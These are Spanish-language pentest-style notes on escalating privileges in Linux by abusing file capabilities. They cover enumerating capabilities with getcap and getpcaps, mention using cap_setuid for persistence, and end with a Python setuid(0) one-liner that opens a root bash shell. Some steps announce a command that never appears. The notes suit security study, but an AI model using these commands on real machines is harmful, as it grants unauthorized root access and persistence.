Mas caps: https://gtfobins.github.io/#+capabilities Listado de capabilities: https://steflan-security.com/linux-privilege-escalation-exploiting-capabilities/

no devuelve las capabilities de un PID

getpcaps <PID>

listar todos los archivos con capabilities

getcap / -r 2>/dev/null

las capabilities mas peligrosas son las cap_setuid+ep que nos permite modicar nuestro UID, tambien se suele usar como forma de persistencia en un equipo


ejemplo util, tenemos un binario de python3

y vamos a darle las siguiente caps

ahora si estamos como otro usuario no root podemos hacer esto

y vemos la cap que hemos puesto antanes en el binario python3, nosotros vemos que el binario no ha cambiado nada de permisos de ni de propietario ni nada pero claro nosotros ahora podemos cambiar nuestro UID

python3 -c 'import os; os.setuid(0); os.system("bash")'

y tenemos una bash de root